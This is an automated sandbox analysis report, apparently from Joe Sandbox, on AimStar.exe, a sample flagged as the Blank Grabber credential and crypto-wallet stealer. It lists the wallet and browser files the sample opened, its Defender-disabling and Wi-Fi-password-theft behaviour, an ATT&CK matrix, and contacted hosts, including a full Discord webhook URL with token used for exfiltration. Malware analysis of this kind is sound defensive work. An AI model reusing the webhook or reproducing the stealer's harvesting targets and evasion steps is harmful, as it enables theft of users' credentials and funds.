              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000003.2021999995.00000192BB8F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2021999995.00000192BB8F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AimStar.exe PID: 7284, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              4
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts3
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              21
              Obfuscated Files or Information
              Security Account Manager48
              System Information Discovery
              SMB/Windows Admin Shares1
              Clipboard Data
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              11
              Software Packing
              NTDS251
              Security Software Discovery
              Distributed Component Object ModelInput Capture5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials151
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc Filesystem1
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583098 Sample: AimStar.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 67 skoch-6bauu.in 2->67 69 ip-api.com 2->69 71 discord.com 2->71 85 Sigma detected: Capture Wi-Fi password 2->85 87 Multi AV Scanner detection for submitted file 2->87 89 Yara detected Blank Grabber 2->89 91 11 other signatures 2->91 11 AimStar.exe 22 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 107 Modifies Windows Defender protection settings 11->107 109 Adds a directory exclusion to Windows Defender 11->109 111 Tries to harvest and steal WLAN passwords 11->111 113 2 other signatures 11->113 15 AimStar.exe 1 88 11->15         started        signatures6 process7 dnsIp8 73 ip-api.com 208.95.112.1, 49709, 49824, 80 TUT-ASUS United States 15->73 75 discord.com 162.159.128.233, 443, 49830 CLOUDFLARENETUS United States 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 Modifies Windows Defender protection settings 15->81 83 5 other signatures 15->83 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 31 other processes 15->26 signatures9 process10 signatures11 93 Suspicious powershell command line found 19->93 95 Uses cmd line tools excessively to alter registry or file data 19->95 97 Encrypted powershell cmdline option found 19->97 105 3 other signatures 19->105 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        99 Modifies Windows Defender protection settings 22->99 33 powershell.exe 23 22->33         started        43 2 other processes 22->43 101 Adds a directory exclusion to Windows Defender 24->101 35 powershell.exe 24->35         started        37 conhost.exe 24->37         started        103 Tries to harvest and steal WLAN passwords 26->103 39 getmac.exe 26->39         started        41 systeminfo.exe 26->41         started        45 58 other processes 26->45 process12 file13 115 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 28->115 117 Writes or reads registry keys via WMI 28->117 119 Loading BitLocker PowerShell Module 28->119 63 C:\Users\user\AppData\...\hrvhwpsf.cmdline, Unicode 45->63 dropped 65 C:\Users\user\AppData\Local\Temp\1KgHr.zip, RAR 45->65 dropped 48 csc.exe 45->48         started        signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\hrvhwpsf.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              AimStar.exe36%VirustotalBrowse
              AimStar.exe34%ReversingLabsWin64.Trojan.Generic
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI72842\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\python313.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pyd0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://api.anonfiles.com/upload0%Avira URL Cloudsafe
              http://ocsp.sectigo.com0$0%Avira URL Cloudsafe
              http://www.heaventools.com0%Avira URL Cloudsafe
              http://www.heaventools.comDVarFileInfo$0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              162.159.128.233
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  skoch-6bauu.in
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNApYaj_fZlIRRuECNHrQlsm0false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabAimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.avito.ru/AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0AimStar.exefalse
                              high
                              https://api.telegram.org/botAimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.ctrip.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#AimStar.exefalse
                                    high
                                    https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.leboncoin.fr/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-fileAimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://tools.ietf.org/html/rfc2388#section-4.4AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://weibo.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://api.anonfiles.com/uploadAimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://packaging.python.org/en/latest/specifications/entry-points/#file-formatAimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.msn.comAimStar.exe, 00000002.00000002.2415755951.000002020E0A4000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216216669.000002020D354000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2164613926.000002169FD97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C80AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C81EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://discord.com/api/v9/users/AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          http://cacerts.digiAimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://peps.python.org/pep-0205/AimStar.exe, 00000002.00000003.2049843028.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029404019.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048372597.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048974996.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2030161372.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048580091.000002020C5FD000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2047069115.000002020C5FD000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029008923.000002020C5E4000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2028931603.000002020C5F6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2025783196.000002020A76B000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051383625.000002020C601000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2046920935.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                              high
                                                              https://www.reddit.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2115599827.000002168FD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B8031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.amazon.ca/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://discord.com/api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNApAimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://dsc.gg/skochworldAimStar.exe, 00000002.00000002.2410298641.000002020CC97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenameAimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyAimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.ebay.co.uk/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.2115599827.000002168FF48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.ebay.de/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codeAimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://go.micropowershell.exe, 00000039.00000002.2230160700.000002A6B8E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerAimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.amazon.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/python/cpython/issues/86361.AimStar.exe, 00000002.00000002.2410298641.000002020CB38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://contoso.com/Iconpowershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://httpbin.org/AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sAimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduleAimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesAimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.ecosia.org/newtab/AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.youtube.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://allegro.pl/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020C958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syAimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://MD8.mozilla.org/1/mAimStar.exe, 00000002.00000003.2403909784.000002020D300000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415755951.000002020E070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://ocsp.sectigo.com0$AimStar.exefalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadataAimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.bbc.co.uk/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://bugzilla.moAimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/python/importlib_metadata/wiki/Development-MethodologyAimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://tools.ietf.org/html/rfc6125#section-6.4.3AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.2115599827.000002168FF48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://google.com/mailAimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://packaging.python.org/specifications/entry-points/AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.heaventools.comAimStar.exefalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.python.org/psf/license/)AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyAimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.google.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.iqiyi.com/AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://i.pinimg.com/736x/ec/43/75/ec4375c15336ba1e72b0062c515a1d92.jpgAimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://foss.heptapod.net/pypy/pypy/-/issues/3539AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://google.com/AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://ocsp.sectigo.com0AimStar.exefalse
                                                                                                                                                                high
                                                                                                                                                                https://tools.ietf.org/html/rfc7231#section-4.3.6)AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2054517827.000002020C643000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://api.gofile.io/getServerr~AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://contoso.com/Licensepowershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://discordapp.com/api/v9/users/AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourceAimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://ip-api.com/json/?fields=225545rAimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specAimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#AimStar.exefalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://github.com/urllib3/urllib3/issues/2920AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://api.gofile.io/getServerr~rAimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataAimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://yahoo.com/AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://account.bellmedia.cAimStar.exe, 00000002.00000002.2415755951.000002020E0B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
